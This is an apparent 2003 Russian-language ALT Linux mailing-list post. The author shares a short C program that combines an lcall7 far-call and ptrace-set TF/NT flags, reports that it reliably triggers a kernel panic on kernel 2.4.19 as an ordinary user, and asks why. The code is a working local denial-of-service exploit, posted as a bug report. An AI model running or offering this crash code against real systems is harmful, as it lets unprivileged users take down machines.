ALT Linux Community general discussions
 help / color / mirror / Atom feed
* [Comm] kernel panic из-за ма-а-а-аленькой программки
@ 2003-01-10  3:19 Пушкин Сергей Алексеевич
  2003-01-10  4:14 ` [Comm] " ASA
  2003-01-10 12:14 ` Konstantin Volckov
  0 siblings, 2 replies; 4+ messages in thread
From: Пушкин Сергей Алексеевич @ 2003-01-10  3:19 UTC (permalink / raw)
  To: Community

[-- Attachment #1: Type: text/plain, Size: 1514 bytes --]


Приветсвую, всезнающий All

Вниманию ядерщиков (или ядрёнщиков :)) )

Есть такая программка:

//-------------------------------------------------------------
#include <sys/ptrace.h>

struct user_regs_struct
{
   long ebx, ecx, edx, esi, edi, ebp, eax;
   unsigned short ds, __ds, es, __es;
   unsigned short fs, __fs, gs, __gs;
   long orig_eax, eip;
   unsigned short cs, __cs;
   long eflags, esp;
   unsigned short ss, __ss;
};
int
main (void)
{
   int pid;
   char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
   void (*lcall7) (void) = (void *) dos;
   struct user_regs_struct d;
if (!(pid = fork ()))
{
   usleep (1000);
   (*lcall7) ();
}
     else
     {
       ptrace (PTRACE_ATTACH, pid, 0, 0);
   while (1)
       {
           wait (0);
           ptrace (PTRACE_GETREGS, pid, 0, &d);
       d.eflags |= 0x4100;    /* set TF and NT */
       ptrace (PTRACE_SETREGS, pid, 0, &d);
       ptrace (PTRACE_SYSCALL, pid, 0, 0);
       }
     }
return 1;
}
//--------------------------------------------------------------

Компилируется и запускается.
В результате стабильный kernel panic даже от простого юзера
(честно говоря под рутом и не пробовал)

Сизиф от 25 декабря минувшего года
rpm -qa | grep kernel
kernel24-up-2.4.19-alt0.8
NVIDIA_kernel-up-2.4.19_1.0.3123-alt0.8

К чему бы это?

-- 
С уважением, Пушкин Сергей aka Stalker

UIN: 35113025
JID: stalker@jabber.ru

XMMS шуршит: MEGAHERZ - BEISS MICH

Скажите, здесь крыша не проезжала?

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]

^ permalink raw reply	[flat|nested] 4+ messages in thread

end of thread, other threads:[~2003-01-10 12:14 UTC | newest]

Thread overview: 4+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2003-01-10  3:19 [Comm] kernel panic из-за ма-а-а-аленькой программки Пушкин Сергей Алексеевич
2003-01-10  4:14 ` [Comm] " ASA
2003-01-10  7:58   ` Евгений В. Хорохорин
2003-01-10 12:14 ` Konstantin Volckov

ALT Linux Community general discussions

This inbox may be cloned and mirrored by anyone:

	git clone --mirror http://lore.altlinux.org/community/0 community/git/0.git

	# If you have public-inbox 1.1+ installed, you may
	# initialize and index your mirror using the following commands:
	public-inbox-init -V2 community community/ http://lore.altlinux.org/community \
		mandrake-russian@linuxteam.iplabs.ru community@lists.altlinux.org community@lists.altlinux.ru community@lists.altlinux.com
	public-inbox-index community

Example config snippet for mirrors.
Newsgroup available over NNTP:
	nntp://lore.altlinux.org/org.altlinux.lists.community


AGPL code for this site: git clone https://public-inbox.org/public-inbox.git